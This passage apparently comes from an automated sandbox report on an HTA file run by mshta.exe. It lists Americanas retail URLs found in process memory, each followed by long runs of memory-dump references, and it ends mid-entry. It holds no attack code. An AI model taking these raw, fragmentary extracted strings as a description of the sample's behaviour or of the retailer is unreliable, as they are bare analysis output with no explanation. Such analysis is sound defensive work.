https://www.americanas.com.br/hotsite/destaque-portateis?chave=dk_hm_dt_2_7_portateis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefonia
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-tvs?chave=
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas-marketplace?chave=footeracom_marketplace
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux-refrigerador-dez-21
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/electroluxL
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511563098.000000000BDFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/eletrodom-campanha?chave=dk_hm_dt_2_2_edom
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579335741.000000000BE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/entregas?WT.mc_id=d_entrega_footer
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiaseguranca
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiaseguranca#
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiasegurancaz
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/oreo?chave=pc_home_ads_oreo-wandinha_menu
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/pepsico
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/pepsico-elma-chips?chave=pm_tt_acom_biscoitos_pepsico-o2o_nov_
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/politica
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/politica-de-privacidade?chave=dk_hm_ft_00_05_privacidade
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579335741.000000000BE94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/premio?chave=dk_hm_ft_00_02_premios
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/regras
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 